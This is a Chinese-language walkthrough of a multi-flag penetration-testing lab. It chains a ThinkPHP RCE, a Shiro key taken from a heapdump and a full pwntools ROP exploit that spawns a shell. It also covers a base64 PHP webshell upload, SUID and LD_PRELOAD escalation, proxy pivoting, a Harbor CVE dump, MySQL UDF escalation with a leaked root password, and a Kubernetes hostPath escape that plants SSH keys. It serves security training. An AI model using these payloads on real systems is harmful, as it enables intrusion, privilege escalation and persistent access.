flag01
利用fscan进行扫描发现有thinkphp,利用工具扫描getshell连接拿到flag1
上传fscan在内网扫描一下内容
用ai总结了一下
| IP地址 | 开放端口/服务 | 版本/系统信息 | 漏洞名称 | 风险等级 | 利用方式/影响 | 修复建议 |
|---|---|---|---|---|---|---|
| 172.28.23.26 | 21/FTP (vsFTPd) | vsFTPd 3.0.3 (Ubuntu) | 匿名登录漏洞 | 中高危 | 可下载OASystem.zip,泄露敏感数据 | 禁用匿名登录,检查并删除暴露文件 |
| 22/SSH | OpenSSH 7.2p2 Ubuntu | 暂无直接漏洞 | 低 | - | 升级OpenSSH,禁用密码登录 | |
| 80/HTTP (Apache) | Apache 2.4.18 | 新翔OA管理系统(暴露联系方式) | 中 | 可能存在业务逻辑漏洞 | 检查Web应用安全性,限制敏感信息暴露 | |
| 172.28.23.33 | 22/SSH | OpenSSH 8.2p1 Ubuntu | 暂无直接漏洞 | 低 | - | 升级OpenSSH,禁用密码登录 |
| 8080/HTTP (SpringBoot) | 智联科技ERP后台 | SpringBoot Actuator堆转储泄露 | 高危 | 泄露内存数据(如数据库密码) | 关闭Actuator未授权访问,修改敏感凭据 | |
| SpringBoot Env未授权访问 | 高危 | 读取环境变量、配置信息 | 限制/env端点访问权限 | |||
| 172.28.23.17 | 22/SSH | OpenSSH 8.2p1 Ubuntu | 暂无直接漏洞 | 低 | - | 升级OpenSSH,禁用密码登录 |
| 80/HTTP (Apache) | Apache 2.4.41 | 无标题页面(需进一步测试) | 待定 | - | 检查网站内容,确认是否存在隐藏漏洞 | |
| 8080/HTTP (ThinkPHP) | ThinkPHP 5.0.23 | ThinkPHP 5.0.23远程代码执行(RCE) | 严重 | 直接获取服务器控制权 | 立即升级ThinkPHP或禁用该端口 |
flag03
先对33分析一下,扫描一下内容
下载一下heapdump看一下内容
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar C:\Users\0raN9e\Desktop\春秋云镜\heapdump
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES
===========================================
写一个shiro内存马进去
看了一下不是root权限
/home/ops01 >ls
HashNote
下载下来分析一下
是一个pwn题,不会pwn直接用网上的脚本跑一下吧
/ >netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:59696 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 172.28.23.33:58428 100.100.0.3:80 TIME_WAIT -
tcp 0 0 172.28.23.33:50218 100.100.145.133:80 TIME_WAIT -
tcp 0 0 172.28.23.33:46490 100.100.145.133:80 TIME_WAIT -
tcp 0 0 172.28.23.33:59764 100.100.145.133:80 TIME_WAIT -
tcp 0 0 172.28.23.33:53762 100.100.30.25:80 ESTABLISHED -
tcp 0 0 172.28.23.33:57550 100.100.145.133:80 TIME_WAIT -
tcp6 0 0 :::8080 :::* LISTEN 667/java
tcp6 0 0 172.28.23.33:8080 172.28.23.17:60456 ESTABLISHED 667/java
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
from pwn import *
context.arch='amd64'
def add(key,data='b'):
p.sendlineafter(b'Option:',b'1')
p.sendlineafter(b'Key:',key)
p.sendlineafter(b'Data:',data)
def show(key):
p.sendlineafter(b'Option:',b'2')
p.sendlineafter(b"Key: ",key);
def edit(key,data):
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',key)
p.sendlineafter(b'Data:',data)
def name(username):
p.sendlineafter(b'Option:',b'4')
p.sendlineafter(b'name:',username)
p = remote('172.28.23.33', 59696)
# p = process('./HashNote')
username=0x5dc980
stack=0x5e4fa8
ukey=b'\x30'*5+b'\x31'+b'\x44'
fake_chunk=flat({
0:username+0x10,
0x10:[username+0x20,len(ukey),\
ukey,0],
0x30:[stack,0x10]
},filler=b'\x00')
p.sendlineafter(b'name',fake_chunk)
p.sendlineafter(b'word','freep@ssw0rd:3')
add(b'\x30'*1+b'\x31'+b'\x44',b'test') # 126
add(b'\x30'*2+b'\x31'+b'\x44',b'test') # 127
show(ukey)
main_ret=u64(p.read(8))-0x1e0
rdi=0x0000000000405e7c # pop rdi ; ret
rsi=0x000000000040974f # pop rsi ; ret
rdx=0x000000000053514b # pop rdx ; pop rbx ; ret
rax=0x00000000004206ba # pop rax ; ret
syscall=0x00000000004560c6 # syscall
fake_chunk=flat({
0:username+0x20,
0x20:[username+0x30,len(ukey),\
ukey,0],
0x40:[main_ret,0x100,b'/bin/sh\x00']
},filler=b'\x00')
name(fake_chunk.ljust(0x80,b'\x00'))
payload=flat([
rdi,username+0x50,
rsi,0,
rdx,0,0,
rax,0x3b,
syscall
])
p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',ukey)
p.sendline(payload)
p.sendlineafter(b'Option:',b'9')
p.interactive()
flag03: flag{6a326f94-6526-4586-8233-152d137281fd}
flag02
直接匿名登录
└─# proxychains4 ftp 172.28.23.26
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.28.23.26:21 ... OK
Connected to 172.28.23.26.
220 (vsFTPd 3.0.3)
Name (172.28.23.26:orange): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||53964|)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.28.23.26:53964 ... OK
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 7536672 Mar 23 2024 OASystem.zip
get OASystem.zip
解压分析一下内容
<?php
/**
* Description: PhpStorm.
* Author: yoby
* DateTime: 2018/12/4 18:01
* Email:logove@qq.com
* Copyright Yoby版权所有
*/
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
$type = ".".$result[2];
$path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');
根目录有uploadbase64.php,会匹配data:image/<input1>;base64,<input2>,以<input1>作为文件后缀,base64_decode(<input2>)作为文件内容写入
POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
imgbase64=data:image/php;base64,PD89YCRfR0VUWzFdYDtldmFsKCRfUE9TVFsxXSk7Pz4=
写入命令发现
回显是ret=127
尝试蚁剑插件提权LD可以进行提权,修改一下.antproxy.php第31行的包含文件,加一个upload目录,然后把文件改一下,这里好像只支持GET的传参,在前端进行命令执行,为www-data
执行提权find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 44680 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 40152 Jan 27 2020 /bin/mount
-rwsr-xr-x 1 root root 40128 Aug 31 2019 /bin/su
-rwsr-xr-x 1 root root 44168 May 8 2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Jan 27 2020 /bin/umount
-rwsr-xr-x 1 root root 71824 Aug 31 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Aug 31 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 Aug 31 2019 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwsr-xr-- 1 root stapusr 173376 Apr 3 2016 /usr/bin/staprun
-rwsr-xr-x 1 root root 39664 Mar 3 2017 /usr/bin/base32
-rwsr-xr-x 1 root root 54256 Aug 31 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40432 Aug 31 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 136808 Jan 21 2021 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus 42992 Jun 12 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 May 27 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 10104 Jan 2 2016 /usr/lib/s-nail/s-nail-privsep
http://172.28.23.26/upload/.antproxy.php?1=system("base32 /flag02.txt");
flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}
看一下ifconfig的内容发现是有两个ip的,有二层
上传fscan扫一下内容
./fscan -h 172.22.14.0/24
扫到的主要内容是
172.22.14.37(Linux):
- SSH(22端口):OpenSSH 7.6p1
- 2379端口(可能是 etcd)和 10250端口(可能是 Kubernetes API)
172.22.14.46(Linux):
HTTP(80端口):运行 Harbor
需要二层代理转发
flag5
frp我这里多层代理转发一直有问题,所以我换了stowaway
在个人vps上执行
./linux_x64_admin -l 2223 -s 2223
在第一层也就是靶机入口处执行
./linux_x64_agent -c 27.25.151.99:2223 -s 2223 --reconnect 8
在第二层也就是oa系统内部
./linux_x64_agent -c 172.28.23.17:8889 -s 2223 --reconnect 8
最后走个socks 6000端口一样打(确实方便好多)
先针对172.22.14.46端口,打个cveCVE-2022-46463/harbor.py at main · 404tk/CVE-2022-46463
简单的查看了信息
python harbor.py http://172.22.14.46/ --dump harbor/secret --v2
里面存在一个run.sh还有一个flag文件,得到了flag5
flag6
下载projectadmin镜像
查看到run.sh
#!/bin/bash
sleep 1
# start
java -jar /app/ProjectAdmin-0.0.1-SNAPSHOT.jar
/usr/bin/tail -f /dev/null
找到ProjectAdmin-0.0.1-SNAPSHOT.jar然后反编译
mkdir unpacked
cd unpacked
jar -xf ../ProjectAdmin-0.0.1-SNAPSHOT.jar
可以得到数据库的信息
spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml
直接用用MDUT进行UDF提权拿到flag6
flag4
之后对172.22.14.37进行扫描,先上传
fscan -h 172.22.14.37 -p 1-65535
D:\ONE-FOX集成工具箱_V8.2公开版_by狐狸\gui_scan\fscan>fscan -h 172.22.14.37 -p 1-65535
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-05-19 16:53:10] [INFO] 暴力破解线程数: 1
[2025-05-19 16:53:11] [INFO] 开始信息扫描
[2025-05-19 16:53:11] [INFO] 最终有效主机数量: 1
[2025-05-19 16:53:11] [INFO] 开始主机扫描
[2025-05-19 16:53:11] [INFO] 有效端口数量: 65535
[2025-05-19 16:53:11] [SUCCESS] 端口开放 172.22.14.37:22
[2025-05-19 16:53:11] [SUCCESS] 服务识别 172.22.14.37:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-05-19 16:54:39] [SUCCESS] 端口开放 172.22.14.37:2380
[2025-05-19 16:54:39] [SUCCESS] 端口开放 172.22.14.37:2379
[2025-05-19 16:54:49] [SUCCESS] 服务识别 172.22.14.37:2380 =>
[2025-05-19 16:54:54] [SUCCESS] 服务识别 172.22.14.37:2379 =>
[2025-05-19 16:57:10] [SUCCESS] 端口开放 172.22.14.37:6443
[2025-05-19 16:58:05] [SUCCESS] 服务识别 172.22.14.37:6443 =>
存在 Kubernetes API server 未授权
{
"paths": [
"/api",
"/api/v1",
"/apis",
"/apis/",
"/apis/admissionregistration.k8s.io",
"/apis/admissionregistration.k8s.io/v1",
"/apis/admissionregistration.k8s.io/v1beta1",
"/apis/apiextensions.k8s.io",
"/apis/apiextensions.k8s.io/v1",
"/apis/apiextensions.k8s.io/v1beta1",
"/apis/apiregistration.k8s.io",
"/apis/apiregistration.k8s.io/v1",
"/apis/apiregistration.k8s.io/v1beta1",
"/apis/apps",
"/apis/apps/v1",
"/apis/authentication.k8s.io",
"/apis/authentication.k8s.io/v1",
"/apis/authentication.k8s.io/v1beta1",
"/apis/authorization.k8s.io",
"/apis/authorization.k8s.io/v1",
"/apis/authorization.k8s.io/v1beta1",
"/apis/autoscaling",
"/apis/autoscaling/v1",
"/apis/autoscaling/v2beta1",
"/apis/autoscaling/v2beta2",
"/apis/batch",
"/apis/batch/v1",
"/apis/batch/v1beta1",
"/apis/certificates.k8s.io",
"/apis/certificates.k8s.io/v1beta1",
"/apis/coordination.k8s.io",
"/apis/coordination.k8s.io/v1",
"/apis/coordination.k8s.io/v1beta1",
"/apis/events.k8s.io",
"/apis/events.k8s.io/v1beta1",
"/apis/extensions",
"/apis/extensions/v1beta1",
"/apis/networking.k8s.io",
"/apis/networking.k8s.io/v1",
"/apis/networking.k8s.io/v1beta1",
"/apis/node.k8s.io",
"/apis/node.k8s.io/v1beta1",
"/apis/policy",
"/apis/policy/v1beta1",
"/apis/rbac.authorization.k8s.io",
"/apis/rbac.authorization.k8s.io/v1",
"/apis/rbac.authorization.k8s.io/v1beta1",
"/apis/scheduling.k8s.io",
"/apis/scheduling.k8s.io/v1",
"/apis/scheduling.k8s.io/v1beta1",
"/apis/storage.k8s.io",
"/apis/storage.k8s.io/v1",
"/apis/storage.k8s.io/v1beta1",
"/healthz",
"/healthz/autoregister-completion",
"/healthz/etcd",
"/healthz/log",
"/healthz/ping",
"/healthz/poststarthook/apiservice-openapi-controller",
"/healthz/poststarthook/apiservice-registration-controller",
"/healthz/poststarthook/apiservice-status-available-controller",
"/healthz/poststarthook/bootstrap-controller",
"/healthz/poststarthook/ca-registration",
"/healthz/poststarthook/crd-informer-synced",
"/healthz/poststarthook/generic-apiserver-start-informers",
"/healthz/poststarthook/kube-apiserver-autoregistration",
"/healthz/poststarthook/rbac/bootstrap-roles",
"/healthz/poststarthook/scheduling/bootstrap-system-priority-classes",
"/healthz/poststarthook/start-apiextensions-controllers",
"/healthz/poststarthook/start-apiextensions-informers",
"/healthz/poststarthook/start-kube-aggregator-informers",
"/healthz/poststarthook/start-kube-apiserver-admission-initializer",
"/livez",
"/livez/autoregister-completion",
"/livez/etcd",
"/livez/log",
"/livez/ping",
"/livez/poststarthook/apiservice-openapi-controller",
"/livez/poststarthook/apiservice-registration-controller",
"/livez/poststarthook/apiservice-status-available-controller",
"/livez/poststarthook/bootstrap-controller",
"/livez/poststarthook/ca-registration",
"/livez/poststarthook/crd-informer-synced",
"/livez/poststarthook/generic-apiserver-start-informers",
"/livez/poststarthook/kube-apiserver-autoregistration",
"/livez/poststarthook/rbac/bootstrap-roles",
"/livez/poststarthook/scheduling/bootstrap-system-priority-classes",
"/livez/poststarthook/start-apiextensions-controllers",
"/livez/poststarthook/start-apiextensions-informers",
"/livez/poststarthook/start-kube-aggregator-informers",
"/livez/poststarthook/start-kube-apiserver-admission-initializer",
"/logs",
"/metrics",
"/openapi/v2",
"/readyz",
"/readyz/autoregister-completion",
"/readyz/etcd",
"/readyz/log",
"/readyz/ping",
"/readyz/poststarthook/apiservice-openapi-controller",
"/readyz/poststarthook/apiservice-registration-controller",
"/readyz/poststarthook/apiservice-status-available-controller",
"/readyz/poststarthook/bootstrap-controller",
"/readyz/poststarthook/ca-registration",
"/readyz/poststarthook/crd-informer-synced",
"/readyz/poststarthook/generic-apiserver-start-informers",
"/readyz/poststarthook/kube-apiserver-autoregistration",
"/readyz/poststarthook/rbac/bootstrap-roles",
"/readyz/poststarthook/scheduling/bootstrap-system-priority-classes",
"/readyz/poststarthook/start-apiextensions-controllers",
"/readyz/poststarthook/start-apiextensions-informers",
"/readyz/poststarthook/start-kube-aggregator-informers",
"/readyz/poststarthook/start-kube-apiserver-admission-initializer",
"/readyz/shutdown",
"/version"
]
}
PS E:\tools> kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: test
Please enter Password: NAME READY STATUS RESTARTS AGE
nginx-deployment-864f8bfd6f-697jq 1/1 Running 0 61s
写一个yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-deployment
labels:
app: nginx
spec:
replicas: 1
selector:
matchLabels:
app: nginx
template:
metadata:
labels:
app: nginx
spec:
containers:
- name: nginx
image: nginx:1.8
volumeMounts:
- mountPath: /mnt
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /
PS E:\tools> kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f aaa.yaml
Please enter Username: test
Please enter Password: deployment.apps/nginx-deployment configured
PS E:\tools> kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-697jq /bin/bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Please enter Username: test
root@nginx-deployment-864f8bfd6f-697jq:/# ls
root@nginx-deployment-864f8bfd6f-697jq:/# id
uid=0(root) gid=0(root) groups=0(root)
写个ssh进去
root@nginx-deployment-864f8bfd6f-697jq:/# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQ................................ root@kali' > /mnt/root/.ssh/authorized_keys
root@ubuntu-k8s:~# ls -al
total 56
drwx------ 8 root root 4096 Mar 17 16:32 .
drwxr-xr-x 22 root root 4096 May 19 16:21 ..
lrwxrwxrwx 1 root root 9 Mar 17 16:32 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 3 root root 4096 Jul 18 2023 .cache
drwx------ 3 root root 4096 Jul 18 2023 .gnupg
drwxr-xr-x 4 root root 4096 Mar 17 15:53 .kube
drwxr-xr-x 14 root root 4096 Mar 17 15:49 metarget
-rw------- 1 root root 1136 Mar 25 2024 .mysql_history
-rw-r--r-- 1 root root 295 Mar 17 16:11 nginx-deployment.yaml
drwxr-xr-x 2 root root 4096 Jul 18 2023 .pip
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 206 May 19 16:21 .pydistutils.cfg
-rw------- 1 root root 7 Mar 17 15:47 .python_history
drwx------ 2 root root 4096 Jul 18 2023 .ssh
查看一下内容得到了
root@ubuntu-k8s:~# cat .mysql_history
_HiStOrY_V2_
show\040databases;
create\040database\040flaghaha;
use\040flaghaha
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag06`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag06`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
show\040tables;
drop\040table\040flag06;
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag04`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag04`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
INSERT\040INTO\040`flag`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
INSERT\040INTO\040`flag04`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
exit
解码一下得到flag
flag{da69c459-7fe5-4535-b8d1-15fff496a29f}